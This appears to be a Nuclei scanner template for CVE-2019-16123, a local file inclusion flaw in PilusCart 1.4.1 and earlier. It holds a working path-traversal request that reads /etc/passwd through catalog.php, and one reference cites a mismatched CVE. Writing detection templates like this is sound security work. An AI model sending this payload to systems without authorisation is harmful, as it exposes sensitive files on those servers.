46 lines
1.6 KiB
YAML
46 lines
1.6 KiB
YAML
id: CVE-2019-16123
|
|
|
|
info:
|
|
name: PilusCart <=1.4.1 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
|
|
remediation: |
|
|
Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html
|
|
- https://www.exploit-db.com/exploits/47315
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-1653
|
|
- https://zerodays.lol/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2019-16123
|
|
cwe-id: CWE-22
|
|
epss-score: 0.72953
|
|
epss-percentile: 0.97822
|
|
cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: kartatopia
|
|
product: piluscart
|
|
tags: cve,cve2019,piluscart,lfi,packetstorm,edb,kartatopia
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100bd736a586524a66ab76f59fef9784f211f2ac5a78cf0562e3206fa4a24a5fd0d022063a9eb03d8140d0164ed9c3e5552ceed30d3f133255938e8be3bb6ecef727c14:922c64590222798bb761d5b6d8e72950 |